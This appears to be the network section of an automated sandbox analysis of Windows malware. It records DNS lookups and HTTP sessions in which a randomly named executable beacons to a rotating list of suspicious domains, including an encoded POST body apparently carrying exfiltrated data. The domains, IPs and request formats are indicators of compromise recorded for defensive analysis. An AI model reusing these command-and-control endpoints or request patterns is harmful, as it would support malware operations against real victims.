Aug 6, 2024 07:59:55.424623966 CEST	49757	80	192.168.2.7	178.63.50.103
Aug 6, 2024 07:59:55.429508924 CEST	80	49757	178.63.50.103	192.168.2.7
Aug 6, 2024 07:59:55.429766893 CEST	80	49757	178.63.50.103	192.168.2.7
Aug 6, 2024 07:59:56.055305958 CEST	80	49757	178.63.50.103	192.168.2.7
Aug 6, 2024 07:59:56.055413008 CEST	80	49757	178.63.50.103	192.168.2.7
Aug 6, 2024 07:59:56.055489063 CEST	49757	80	192.168.2.7	178.63.50.103
Aug 6, 2024 07:59:56.933568001 CEST	49757	80	192.168.2.7	178.63.50.103
Aug 6, 2024 07:59:57.949316025 CEST	49758	80	192.168.2.7	178.63.50.103
Aug 6, 2024 07:59:57.954363108 CEST	80	49758	178.63.50.103	192.168.2.7
Aug 6, 2024 07:59:57.956572056 CEST	49758	80	192.168.2.7	178.63.50.103
Aug 6, 2024 07:59:57.965095043 CEST	49758	80	192.168.2.7	178.63.50.103
Aug 6, 2024 07:59:57.969934940 CEST	80	49758	178.63.50.103	192.168.2.7
Aug 6, 2024 07:59:58.614996910 CEST	80	49758	178.63.50.103	192.168.2.7
Aug 6, 2024 07:59:58.615035057 CEST	80	49758	178.63.50.103	192.168.2.7
Aug 6, 2024 07:59:58.615176916 CEST	49758	80	192.168.2.7	178.63.50.103
Aug 6, 2024 07:59:58.619266987 CEST	49758	80	192.168.2.7	178.63.50.103
Aug 6, 2024 07:59:58.624078035 CEST	80	49758	178.63.50.103	192.168.2.7
Aug 6, 2024 08:00:04.484549046 CEST	49759	80	192.168.2.7	64.64.253.144
Aug 6, 2024 08:00:04.489522934 CEST	80	49759	64.64.253.144	192.168.2.7
Aug 6, 2024 08:00:04.489658117 CEST	49759	80	192.168.2.7	64.64.253.144
Aug 6, 2024 08:00:04.501315117 CEST	49759	80	192.168.2.7	64.64.253.144
Aug 6, 2024 08:00:04.506865978 CEST	80	49759	64.64.253.144	192.168.2.7
Aug 6, 2024 08:00:05.092885017 CEST	80	49759	64.64.253.144	192.168.2.7
Aug 6, 2024 08:00:05.093116999 CEST	80	49759	64.64.253.144	192.168.2.7
Aug 6, 2024 08:00:05.093329906 CEST	49759	80	192.168.2.7	64.64.253.144
Aug 6, 2024 08:00:06.007801056 CEST	49759	80	192.168.2.7	64.64.253.144
Aug 6, 2024 08:00:07.029580116 CEST	49760	80	192.168.2.7	64.64.253.144
Aug 6, 2024 08:00:07.034722090 CEST	80	49760	64.64.253.144	192.168.2.7
Aug 6, 2024 08:00:07.037691116 CEST	49760	80	192.168.2.7	64.64.253.144
Aug 6, 2024 08:00:07.049094915 CEST	49760	80	192.168.2.7	64.64.253.144
Aug 6, 2024 08:00:07.053946972 CEST	80	49760	64.64.253.144	192.168.2.7
Aug 6, 2024 08:00:07.611733913 CEST	80	49760	64.64.253.144	192.168.2.7
Aug 6, 2024 08:00:07.611937046 CEST	80	49760	64.64.253.144	192.168.2.7
Aug 6, 2024 08:00:07.612102032 CEST	49760	80	192.168.2.7	64.64.253.144
Aug 6, 2024 08:00:08.554853916 CEST	49760	80	192.168.2.7	64.64.253.144
Aug 6, 2024 08:00:09.573746920 CEST	49761	80	192.168.2.7	64.64.253.144
Aug 6, 2024 08:00:09.578787088 CEST	80	49761	64.64.253.144	192.168.2.7
Aug 6, 2024 08:00:09.580517054 CEST	49761	80	192.168.2.7	64.64.253.144
Aug 6, 2024 08:00:09.594558954 CEST	49761	80	192.168.2.7	64.64.253.144
Aug 6, 2024 08:00:09.599757910 CEST	80	49761	64.64.253.144	192.168.2.7
Aug 6, 2024 08:00:09.599793911 CEST	80	49761	64.64.253.144	192.168.2.7
Aug 6, 2024 08:00:10.152914047 CEST	80	49761	64.64.253.144	192.168.2.7
Aug 6, 2024 08:00:10.153315067 CEST	80	49761	64.64.253.144	192.168.2.7
Aug 6, 2024 08:00:10.153366089 CEST	49761	80	192.168.2.7	64.64.253.144
Aug 6, 2024 08:00:11.105690956 CEST	49761	80	192.168.2.7	64.64.253.144
Aug 6, 2024 08:00:12.120954990 CEST	49762	80	192.168.2.7	64.64.253.144
Aug 6, 2024 08:00:12.125845909 CEST	80	49762	64.64.253.144	192.168.2.7
Aug 6, 2024 08:00:12.125919104 CEST	49762	80	192.168.2.7	64.64.253.144
Aug 6, 2024 08:00:12.137753963 CEST	49762	80	192.168.2.7	64.64.253.144
Aug 6, 2024 08:00:12.142580986 CEST	80	49762	64.64.253.144	192.168.2.7
Aug 6, 2024 08:00:12.699265957 CEST	80	49762	64.64.253.144	192.168.2.7
Aug 6, 2024 08:00:12.699321985 CEST	80	49762	64.64.253.144	192.168.2.7
Aug 6, 2024 08:00:12.699415922 CEST	49762	80	192.168.2.7	64.64.253.144
Aug 6, 2024 08:00:12.702560902 CEST	49762	80	192.168.2.7	64.64.253.144
Aug 6, 2024 08:00:12.707287073 CEST	80	49762	64.64.253.144	192.168.2.7
Aug 6, 2024 08:00:17.744005919 CEST	49763	80	192.168.2.7	104.21.17.191
Aug 6, 2024 08:00:17.748852968 CEST	80	49763	104.21.17.191	192.168.2.7
Aug 6, 2024 08:00:17.749739885 CEST	49763	80	192.168.2.7	104.21.17.191
Aug 6, 2024 08:00:17.761635065 CEST	49763	80	192.168.2.7	104.21.17.191
Aug 6, 2024 08:00:17.766494036 CEST	80	49763	104.21.17.191	192.168.2.7
Aug 6, 2024 08:00:18.404103994 CEST	80	49763	104.21.17.191	192.168.2.7
Aug 6, 2024 08:00:18.404678106 CEST	80	49763	104.21.17.191	192.168.2.7
Aug 6, 2024 08:00:18.404726982 CEST	49763	80	192.168.2.7	104.21.17.191
Aug 6, 2024 08:00:19.273647070 CEST	49763	80	192.168.2.7	104.21.17.191
Aug 6, 2024 08:00:20.292994976 CEST	49764	80	192.168.2.7	104.21.17.191
Aug 6, 2024 08:00:20.298877001 CEST	80	49764	104.21.17.191	192.168.2.7
Aug 6, 2024 08:00:20.298958063 CEST	49764	80	192.168.2.7	104.21.17.191
Aug 6, 2024 08:00:20.311768055 CEST	49764	80	192.168.2.7	104.21.17.191
Aug 6, 2024 08:00:20.316729069 CEST	80	49764	104.21.17.191	192.168.2.7
Aug 6, 2024 08:00:20.963104963 CEST	80	49764	104.21.17.191	192.168.2.7
Aug 6, 2024 08:00:20.964174032 CEST	80	49764	104.21.17.191	192.168.2.7
Aug 6, 2024 08:00:20.964440107 CEST	49764	80	192.168.2.7	104.21.17.191
Aug 6, 2024 08:00:21.821624994 CEST	49764	80	192.168.2.7	104.21.17.191
Aug 6, 2024 08:00:22.843409061 CEST	49765	80	192.168.2.7	104.21.17.191
Aug 6, 2024 08:00:22.848323107 CEST	80	49765	104.21.17.191	192.168.2.7
Aug 6, 2024 08:00:22.848418951 CEST	49765	80	192.168.2.7	104.21.17.191
Aug 6, 2024 08:00:22.859719038 CEST	49765	80	192.168.2.7	104.21.17.191
Aug 6, 2024 08:00:22.864687920 CEST	80	49765	104.21.17.191	192.168.2.7
Aug 6, 2024 08:00:22.864701033 CEST	80	49765	104.21.17.191	192.168.2.7
Aug 6, 2024 08:00:23.512236118 CEST	80	49765	104.21.17.191	192.168.2.7
Aug 6, 2024 08:00:23.512636900 CEST	80	49765	104.21.17.191	192.168.2.7
Aug 6, 2024 08:00:23.513672113 CEST	49765	80	192.168.2.7	104.21.17.191
Aug 6, 2024 08:00:24.367398024 CEST	49765	80	192.168.2.7	104.21.17.191
Aug 6, 2024 08:00:25.385894060 CEST	49766	80	192.168.2.7	104.21.17.191
Aug 6, 2024 08:00:25.390856028 CEST	80	49766	104.21.17.191	192.168.2.7
Aug 6, 2024 08:00:25.391068935 CEST	49766	80	192.168.2.7	104.21.17.191
Aug 6, 2024 08:00:25.398396015 CEST	49766	80	192.168.2.7	104.21.17.191
Aug 6, 2024 08:00:25.403170109 CEST	80	49766	104.21.17.191	192.168.2.7
Aug 6, 2024 08:00:26.044250011 CEST	80	49766	104.21.17.191	192.168.2.7
Aug 6, 2024 08:00:26.044270992 CEST	80	49766	104.21.17.191	192.168.2.7
Aug 6, 2024 08:00:26.044286013 CEST	80	49766	104.21.17.191	192.168.2.7
Aug 6, 2024 08:00:26.044296980 CEST	80	49766	104.21.17.191	192.168.2.7
Aug 6, 2024 08:00:26.044310093 CEST	80	49766	104.21.17.191	192.168.2.7
Aug 6, 2024 08:00:26.044321060 CEST	80	49766	104.21.17.191	192.168.2.7
Aug 6, 2024 08:00:26.044332027 CEST	80	49766	104.21.17.191	192.168.2.7
Aug 6, 2024 08:00:26.044337034 CEST	49766	80	192.168.2.7	104.21.17.191
Aug 6, 2024 08:00:26.044348001 CEST	80	49766	104.21.17.191	192.168.2.7
Aug 6, 2024 08:00:26.044359922 CEST	80	49766	104.21.17.191	192.168.2.7
Aug 6, 2024 08:00:26.044372082 CEST	80	49766	104.21.17.191	192.168.2.7
Aug 6, 2024 08:00:26.044419050 CEST	49766	80	192.168.2.7	104.21.17.191
Aug 6, 2024 08:00:26.044442892 CEST	49766	80	192.168.2.7	104.21.17.191
Aug 6, 2024 08:00:26.049220085 CEST	80	49766	104.21.17.191	192.168.2.7
Aug 6, 2024 08:00:26.049318075 CEST	80	49766	104.21.17.191	192.168.2.7
Aug 6, 2024 08:00:26.049380064 CEST	49766	80	192.168.2.7	104.21.17.191
Aug 6, 2024 08:00:26.133058071 CEST	80	49766	104.21.17.191	192.168.2.7
Aug 6, 2024 08:00:26.133079052 CEST	80	49766	104.21.17.191	192.168.2.7
Aug 6, 2024 08:00:26.133091927 CEST	80	49766	104.21.17.191	192.168.2.7
Aug 6, 2024 08:00:26.133104086 CEST	80	49766	104.21.17.191	192.168.2.7
Aug 6, 2024 08:00:26.133116961 CEST	80	49766	104.21.17.191	192.168.2.7
Aug 6, 2024 08:00:26.133136988 CEST	80	49766	104.21.17.191	192.168.2.7
Aug 6, 2024 08:00:26.133152962 CEST	49766	80	192.168.2.7	104.21.17.191
Aug 6, 2024 08:00:26.133258104 CEST	49766	80	192.168.2.7	104.21.17.191
Aug 6, 2024 08:00:26.133266926 CEST	80	49766	104.21.17.191	192.168.2.7
Aug 6, 2024 08:00:26.133352995 CEST	80	49766	104.21.17.191	192.168.2.7
Aug 6, 2024 08:00:26.133397102 CEST	49766	80	192.168.2.7	104.21.17.191
Aug 6, 2024 08:00:26.139456987 CEST	49766	80	192.168.2.7	104.21.17.191
Aug 6, 2024 08:00:26.144226074 CEST	80	49766	104.21.17.191	192.168.2.7

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 6, 2024 07:56:15.644946098 CEST	57666	53	192.168.2.7	1.1.1.1
Aug 6, 2024 07:56:53.536145926 CEST	59279	53	192.168.2.7	1.1.1.1
Aug 6, 2024 07:56:53.636524916 CEST	53	59279	1.1.1.1	192.168.2.7
Aug 6, 2024 07:57:10.057621956 CEST	51102	53	192.168.2.7	1.1.1.1
Aug 6, 2024 07:57:10.145577908 CEST	53	51102	1.1.1.1	192.168.2.7
Aug 6, 2024 07:57:23.636908054 CEST	63532	53	192.168.2.7	1.1.1.1
Aug 6, 2024 07:57:23.943577051 CEST	53	63532	1.1.1.1	192.168.2.7
Aug 6, 2024 07:57:37.135905981 CEST	57385	53	192.168.2.7	1.1.1.1
Aug 6, 2024 07:57:37.370098114 CEST	53	57385	1.1.1.1	192.168.2.7
Aug 6, 2024 07:57:50.949575901 CEST	57800	53	192.168.2.7	1.1.1.1
Aug 6, 2024 07:57:51.053256035 CEST	53	57800	1.1.1.1	192.168.2.7
Aug 6, 2024 07:58:04.621443033 CEST	61463	53	192.168.2.7	1.1.1.1
Aug 6, 2024 07:58:04.763020039 CEST	53	61463	1.1.1.1	192.168.2.7
Aug 6, 2024 07:58:17.949311018 CEST	61438	53	192.168.2.7	1.1.1.1
Aug 6, 2024 07:58:18.105042934 CEST	53	61438	1.1.1.1	192.168.2.7
Aug 6, 2024 07:58:31.246665001 CEST	57062	53	192.168.2.7	1.1.1.1
Aug 6, 2024 07:58:31.678353071 CEST	53	57062	1.1.1.1	192.168.2.7
Aug 6, 2024 07:58:46.528517008 CEST	57036	53	192.168.2.7	1.1.1.1
Aug 6, 2024 07:58:46.964060068 CEST	53	57036	1.1.1.1	192.168.2.7
Aug 6, 2024 07:59:00.292366028 CEST	55527	53	192.168.2.7	1.1.1.1
Aug 6, 2024 07:59:00.749176025 CEST	53	55527	1.1.1.1	192.168.2.7
Aug 6, 2024 07:59:14.060086012 CEST	58848	53	192.168.2.7	1.1.1.1
Aug 6, 2024 07:59:14.079876900 CEST	53	58848	1.1.1.1	192.168.2.7
Aug 6, 2024 07:59:22.137201071 CEST	60462	53	192.168.2.7	1.1.1.1
Aug 6, 2024 07:59:23.133189917 CEST	60462	53	192.168.2.7	1.1.1.1
Aug 6, 2024 07:59:23.247720003 CEST	53	60462	1.1.1.1	192.168.2.7
Aug 6, 2024 07:59:23.247747898 CEST	53	60462	1.1.1.1	192.168.2.7
Aug 6, 2024 07:59:36.777349949 CEST	52974	53	192.168.2.7	1.1.1.1
Aug 6, 2024 07:59:36.789738894 CEST	53	52974	1.1.1.1	192.168.2.7
Aug 6, 2024 07:59:50.047513008 CEST	55135	53	192.168.2.7	1.1.1.1
Aug 6, 2024 07:59:50.300972939 CEST	53	55135	1.1.1.1	192.168.2.7
Aug 6, 2024 08:00:03.636568069 CEST	56378	53	192.168.2.7	1.1.1.1
Aug 6, 2024 08:00:04.482075930 CEST	53	56378	1.1.1.1	192.168.2.7
Aug 6, 2024 08:00:17.717603922 CEST	56895	53	192.168.2.7	1.1.1.1
Aug 6, 2024 08:00:17.739278078 CEST	53	56895	1.1.1.1	192.168.2.7

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Aug 6, 2024 07:56:15.644946098 CEST	192.168.2.7	1.1.1.1	0xa63c	Standard query (0)	time.windows.com	A (IP address)	IN (0x0001)	false
Aug 6, 2024 07:56:53.536145926 CEST	192.168.2.7	1.1.1.1	0xdb65	Standard query (0)	www.gloryastore.site	A (IP address)	IN (0x0001)	false
Aug 6, 2024 07:57:10.057621956 CEST	192.168.2.7	1.1.1.1	0x6697	Standard query (0)	www.ayypromo.shop	A (IP address)	IN (0x0001)	false
Aug 6, 2024 07:57:23.636908054 CEST	192.168.2.7	1.1.1.1	0x8b63	Standard query (0)	www.meetfactory.biz	A (IP address)	IN (0x0001)	false
Aug 6, 2024 07:57:37.135905981 CEST	192.168.2.7	1.1.1.1	0xb1dd	Standard query (0)	www.4u2b.online	A (IP address)	IN (0x0001)	false
Aug 6, 2024 07:57:50.949575901 CEST	192.168.2.7	1.1.1.1	0xb2f2	Standard query (0)	www.7ddw.top	A (IP address)	IN (0x0001)	false
Aug 6, 2024 07:58:04.621443033 CEST	192.168.2.7	1.1.1.1	0xd61f	Standard query (0)	www.ytonetgearhub.shop	A (IP address)	IN (0x0001)	false
Aug 6, 2024 07:58:17.949311018 CEST	192.168.2.7	1.1.1.1	0xe76a	Standard query (0)	www.izen.group	A (IP address)	IN (0x0001)	false
Aug 6, 2024 07:58:31.246665001 CEST	192.168.2.7	1.1.1.1	0x6f9b	Standard query (0)	www.mtmoriacolives.store	A (IP address)	IN (0x0001)	false
Aug 6, 2024 07:58:46.528517008 CEST	192.168.2.7	1.1.1.1	0x2839	Standard query (0)	www.zippio.top	A (IP address)	IN (0x0001)	false
Aug 6, 2024 07:59:00.292366028 CEST	192.168.2.7	1.1.1.1	0xae97	Standard query (0)	www.iqejgn.asia	A (IP address)	IN (0x0001)	false
Aug 6, 2024 07:59:14.060086012 CEST	192.168.2.7	1.1.1.1	0x3ce	Standard query (0)	www.kej-sii.cloud	A (IP address)	IN (0x0001)	false
Aug 6, 2024 07:59:22.137201071 CEST	192.168.2.7	1.1.1.1	0xc8d2	Standard query (0)	www.ahabet.asia	A (IP address)	IN (0x0001)	false
Aug 6, 2024 07:59:23.133189917 CEST	192.168.2.7	1.1.1.1	0xc8d2	Standard query (0)	www.ahabet.asia	A (IP address)	IN (0x0001)	false
Aug 6, 2024 07:59:36.777349949 CEST	192.168.2.7	1.1.1.1	0x59c9	Standard query (0)	www.smashcoin.club	A (IP address)	IN (0x0001)	false
Aug 6, 2024 07:59:50.047513008 CEST	192.168.2.7	1.1.1.1	0x4683	Standard query (0)	www.keswickstream.online	A (IP address)	IN (0x0001)	false
Aug 6, 2024 08:00:03.636568069 CEST	192.168.2.7	1.1.1.1	0xe534	Standard query (0)	www.6666580a9.shop	A (IP address)	IN (0x0001)	false
Aug 6, 2024 08:00:17.717603922 CEST	192.168.2.7	1.1.1.1	0x9aac	Standard query (0)	www.moodplay.store	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Aug 6, 2024 07:56:15.652039051 CEST	1.1.1.1	192.168.2.7	0xa63c	No error (0)	time.windows.com	twc.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)	false
Aug 6, 2024 07:56:53.636524916 CEST	1.1.1.1	192.168.2.7	0xdb65	No error (0)	www.gloryastore.site	redirect.natrocdn.com		CNAME (Canonical name)	IN (0x0001)	false
Aug 6, 2024 07:56:53.636524916 CEST	1.1.1.1	192.168.2.7	0xdb65	No error (0)	redirect.natrocdn.com	natroredirect.natrocdn.com		CNAME (Canonical name)	IN (0x0001)	false
Aug 6, 2024 07:56:53.636524916 CEST	1.1.1.1	192.168.2.7	0xdb65	No error (0)	natroredirect.natrocdn.com		85.159.66.93	A (IP address)	IN (0x0001)	false
Aug 6, 2024 07:57:10.145577908 CEST	1.1.1.1	192.168.2.7	0x6697	No error (0)	www.ayypromo.shop		176.57.64.102	A (IP address)	IN (0x0001)	false
Aug 6, 2024 07:57:23.943577051 CEST	1.1.1.1	192.168.2.7	0x8b63	No error (0)	www.meetfactory.biz		45.33.30.197	A (IP address)	IN (0x0001)	false
Aug 6, 2024 07:57:23.943577051 CEST	1.1.1.1	192.168.2.7	0x8b63	No error (0)	www.meetfactory.biz		72.14.185.43	A (IP address)	IN (0x0001)	false
Aug 6, 2024 07:57:23.943577051 CEST	1.1.1.1	192.168.2.7	0x8b63	No error (0)	www.meetfactory.biz		45.33.18.44	A (IP address)	IN (0x0001)	false
Aug 6, 2024 07:57:23.943577051 CEST	1.1.1.1	192.168.2.7	0x8b63	No error (0)	www.meetfactory.biz		45.56.79.23	A (IP address)	IN (0x0001)	false
Aug 6, 2024 07:57:23.943577051 CEST	1.1.1.1	192.168.2.7	0x8b63	No error (0)	www.meetfactory.biz		198.58.118.167	A (IP address)	IN (0x0001)	false
Aug 6, 2024 07:57:23.943577051 CEST	1.1.1.1	192.168.2.7	0x8b63	No error (0)	www.meetfactory.biz		45.33.2.79	A (IP address)	IN (0x0001)	false
Aug 6, 2024 07:57:23.943577051 CEST	1.1.1.1	192.168.2.7	0x8b63	No error (0)	www.meetfactory.biz		173.255.194.134	A (IP address)	IN (0x0001)	false
Aug 6, 2024 07:57:23.943577051 CEST	1.1.1.1	192.168.2.7	0x8b63	No error (0)	www.meetfactory.biz		45.33.20.235	A (IP address)	IN (0x0001)	false
Aug 6, 2024 07:57:23.943577051 CEST	1.1.1.1	192.168.2.7	0x8b63	No error (0)	www.meetfactory.biz		72.14.178.174	A (IP address)	IN (0x0001)	false
Aug 6, 2024 07:57:23.943577051 CEST	1.1.1.1	192.168.2.7	0x8b63	No error (0)	www.meetfactory.biz		45.79.19.196	A (IP address)	IN (0x0001)	false
Aug 6, 2024 07:57:23.943577051 CEST	1.1.1.1	192.168.2.7	0x8b63	No error (0)	www.meetfactory.biz		45.33.23.183	A (IP address)	IN (0x0001)	false
Aug 6, 2024 07:57:23.943577051 CEST	1.1.1.1	192.168.2.7	0x8b63	No error (0)	www.meetfactory.biz		96.126.123.244	A (IP address)	IN (0x0001)	false
Aug 6, 2024 07:57:37.370098114 CEST	1.1.1.1	192.168.2.7	0xb1dd	No error (0)	www.4u2b.online	4u2b.online		CNAME (Canonical name)	IN (0x0001)	false
Aug 6, 2024 07:57:37.370098114 CEST	1.1.1.1	192.168.2.7	0xb1dd	No error (0)	4u2b.online		141.94.102.188	A (IP address)	IN (0x0001)	false
Aug 6, 2024 07:57:51.053256035 CEST	1.1.1.1	192.168.2.7	0xb2f2	No error (0)	www.7ddw.top	7ddw.top		CNAME (Canonical name)	IN (0x0001)	false
Aug 6, 2024 07:57:51.053256035 CEST	1.1.1.1	192.168.2.7	0xb2f2	No error (0)	7ddw.top		154.23.184.207	A (IP address)	IN (0x0001)	false
Aug 6, 2024 07:58:04.763020039 CEST	1.1.1.1	192.168.2.7	0xd61f	No error (0)	www.ytonetgearhub.shop		194.195.220.41	A (IP address)	IN (0x0001)	false
Aug 6, 2024 07:58:18.105042934 CEST	1.1.1.1	192.168.2.7	0xe76a	No error (0)	www.izen.group		13.248.169.48	A (IP address)	IN (0x0001)	false
Aug 6, 2024 07:58:18.105042934 CEST	1.1.1.1	192.168.2.7	0xe76a	No error (0)	www.izen.group		76.223.54.146	A (IP address)	IN (0x0001)	false
Aug 6, 2024 07:58:31.678353071 CEST	1.1.1.1	192.168.2.7	0x6f9b	No error (0)	www.mtmoriacolives.store		103.42.108.46	A (IP address)	IN (0x0001)	false
Aug 6, 2024 07:58:46.964060068 CEST	1.1.1.1	192.168.2.7	0x2839	No error (0)	www.zippio.top		203.161.46.201	A (IP address)	IN (0x0001)	false
Aug 6, 2024 07:59:00.749176025 CEST	1.1.1.1	192.168.2.7	0xae97	No error (0)	www.iqejgn.asia		45.76.85.183	A (IP address)	IN (0x0001)	false
Aug 6, 2024 07:59:14.079876900 CEST	1.1.1.1	192.168.2.7	0x3ce	Name error (3)	www.kej-sii.cloud	none	none	A (IP address)	IN (0x0001)	false
Aug 6, 2024 07:59:23.247720003 CEST	1.1.1.1	192.168.2.7	0xc8d2	No error (0)	www.ahabet.asia	ahabet.asia		CNAME (Canonical name)	IN (0x0001)	false
Aug 6, 2024 07:59:23.247720003 CEST	1.1.1.1	192.168.2.7	0xc8d2	No error (0)	ahabet.asia		198.54.126.42	A (IP address)	IN (0x0001)	false
Aug 6, 2024 07:59:23.247747898 CEST	1.1.1.1	192.168.2.7	0xc8d2	No error (0)	www.ahabet.asia	ahabet.asia		CNAME (Canonical name)	IN (0x0001)	false
Aug 6, 2024 07:59:23.247747898 CEST	1.1.1.1	192.168.2.7	0xc8d2	No error (0)	ahabet.asia		198.54.126.42	A (IP address)	IN (0x0001)	false
Aug 6, 2024 07:59:36.789738894 CEST	1.1.1.1	192.168.2.7	0x59c9	No error (0)	www.smashcoin.club	smashcoin.club		CNAME (Canonical name)	IN (0x0001)	false
Aug 6, 2024 07:59:36.789738894 CEST	1.1.1.1	192.168.2.7	0x59c9	No error (0)	smashcoin.club		68.183.37.14	A (IP address)	IN (0x0001)	false
Aug 6, 2024 07:59:50.300972939 CEST	1.1.1.1	192.168.2.7	0x4683	No error (0)	www.keswickstream.online		178.63.50.103	A (IP address)	IN (0x0001)	false
Aug 6, 2024 08:00:04.482075930 CEST	1.1.1.1	192.168.2.7	0xe534	No error (0)	www.6666580a9.shop	ak7y10.tta88.com		CNAME (Canonical name)	IN (0x0001)	false
Aug 6, 2024 08:00:04.482075930 CEST	1.1.1.1	192.168.2.7	0xe534	No error (0)	ak7y10.tta88.com		64.64.253.144	A (IP address)	IN (0x0001)	false
Aug 6, 2024 08:00:17.739278078 CEST	1.1.1.1	192.168.2.7	0x9aac	No error (0)	www.moodplay.store		104.21.17.191	A (IP address)	IN (0x0001)	false
Aug 6, 2024 08:00:17.739278078 CEST	1.1.1.1	192.168.2.7	0x9aac	No error (0)	www.moodplay.store		172.67.178.49	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.gloryastore.site

www.ayypromo.shop

www.meetfactory.biz

www.4u2b.online

www.7ddw.top

www.ytonetgearhub.shop

www.izen.group

www.mtmoriacolives.store

www.zippio.top

www.iqejgn.asia

www.ahabet.asia

www.smashcoin.club

www.keswickstream.online

www.6666580a9.shop

www.moodplay.store

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	49709	85.159.66.93	80	6440	C:\Program Files (x86)\RGETBdyDZIpEZYdbVZOuCDMQxXNsRhHHOtJterkYovBCNXmethdSQujttpFK\hoCcQGubWgo.exe

Timestamp	Bytes transferred	Direction	Data
Aug 6, 2024 07:56:53.660041094 CEST	540	OUT	GET /w66n/?K4G=Thy4J4VXH8ud&wLTtn0=JNMn5wU33n82w51+xRzP3FlJSWcCaURVt+q7Pzr5OEhwI1ARCPGXZ34z1Qjm/zGtz6t2DMTKfskelbcwOWJ0KoKtKPXvtVz2A+q24UxvxXdwB5cNRWCJTn4Hp/JjmuKwWpo8eZEk+KzL HTTP/1.1 Host: www.gloryastore.site Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
Aug 6, 2024 07:56:55.011357069 CEST	225	IN	HTTP/1.1 404 Not Found Server: nginx/1.14.1 Date: Tue, 06 Aug 2024 05:56:54 GMT Content-Length: 0 Connection: close X-Rate-Limit-Limit: 5s X-Rate-Limit-Remaining: 19 X-Rate-Limit-Reset: 2024-08-06T05:56:59.2446784Z
Aug 6, 2024 07:56:55.011553049 CEST	225	IN	HTTP/1.1 404 Not Found Server: nginx/1.14.1 Date: Tue, 06 Aug 2024 05:56:54 GMT Content-Length: 0 Connection: close X-Rate-Limit-Limit: 5s X-Rate-Limit-Remaining: 19 X-Rate-Limit-Reset: 2024-08-06T05:56:59.2446784Z

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.7	49710	176.57.64.102	80	6440	C:\Program Files (x86)\RGETBdyDZIpEZYdbVZOuCDMQxXNsRhHHOtJterkYovBCNXmethdSQujttpFK\hoCcQGubWgo.exe

Timestamp	Bytes transferred	Direction	Data
Aug 6, 2024 07:57:10.165349007 CEST	798	OUT	POST /6ocx/ HTTP/1.1 Host: www.ayypromo.shop Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Length: 219 Content-Type: application/x-www-form-urlencoded Connection: close Cache-Control: no-cache Origin: http://www.ayypromo.shop Referer: http://www.ayypromo.shop/6ocx/ User-Agent: Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 Data Raw: 77 4c 54 74 6e 30 3d 73 67 4c 4f 4e 44 71 4e 4a 6b 54 64 51 79 67 68 44 50 33 5a 4b 78 54 61 7a 31 74 54 4f 43 50 57 71 6b 72 33 70 46 74 33 63 64 71 61 72 56 66 71 50 35 57 49 68 68 6d 50 4f 70 66 63 62 4d 48 33 58 45 4f 47 52 4b 74 55 42 38 75 33 45 78 38 41 48 76 6b 48 71 57 65 75 4a 63 2b 2f 46 78 55 2b 63 6e 48 54 54 47 6e 4f 6c 70 43 32 4d 4a 34 51 4e 70 4b 5a 48 61 59 49 59 36 72 33 4f 67 63 61 5a 6a 79 44 44 32 37 48 65 38 63 47 38 5a 71 71 77 78 32 6b 74 61 77 43 36 43 63 74 32 4c 2f 39 32 4b 47 47 50 35 4f 31 6d 30 49 36 45 59 51 7a 30 32 4c 4d 74 71 57 79 39 44 58 57 62 55 58 7a 2f 53 35 66 37 2f 4b 57 79 50 73 43 31 4a 4f 63 30 67 3d 3d Data Ascii: wLTtn0=sgLONDqNJkTdQyghDP3ZKxTaz1tTOCPWqkr3pFt3cdqarVfqP5WIhhmPOpfcbMH3XEOGRKtUB8u3Ex8AHvkHqWeuJc+/FxU+cnHTTGnOlpC2MJ4QNpKZHaYIY6r3OgcaZjyDD27He8cG8Zqqwx2ktawC6Cct2L/92KGGP5O1m0I6EYQz02LMtqWy9DXWbUXz/S5f7/KWyPsC1JOc0g==
Aug 6, 2024 07:57:10.827244997 CEST	749	IN	HTTP/1.1 404 Not Found Server: ddos-guard Connection: close Set-Cookie: __ddg1_=GxmQO4P11ib7m2UQwyqp; Domain=.ayypromo.shop; HttpOnly; Path=/; Expires=Wed, 06-Aug-2025 05:57:10 GMT Date: Tue, 06 Aug 2024 05:57:10 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 340 Last-Modified: Tue, 29 May 2018 17:41:27 GMT ETag: "154-56d5bbe607fc0" Accept-Ranges: bytes X-Frame-Options: SAMEORIGIN Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 3e 3c 74 69 74 6c 65 3e 54 69 6c 64 61 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 65 65 65 3b 22 3e 3c 74 61 62 6c 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 31 30 30 25 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 22 3e 3c 74 72 3e 3c 74 64 20 73 74 79 6c 65 3d 22 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 20 6d 69 64 64 6c 65 3b 20 74 65 78 74 2d 61 6c 69 67 6e 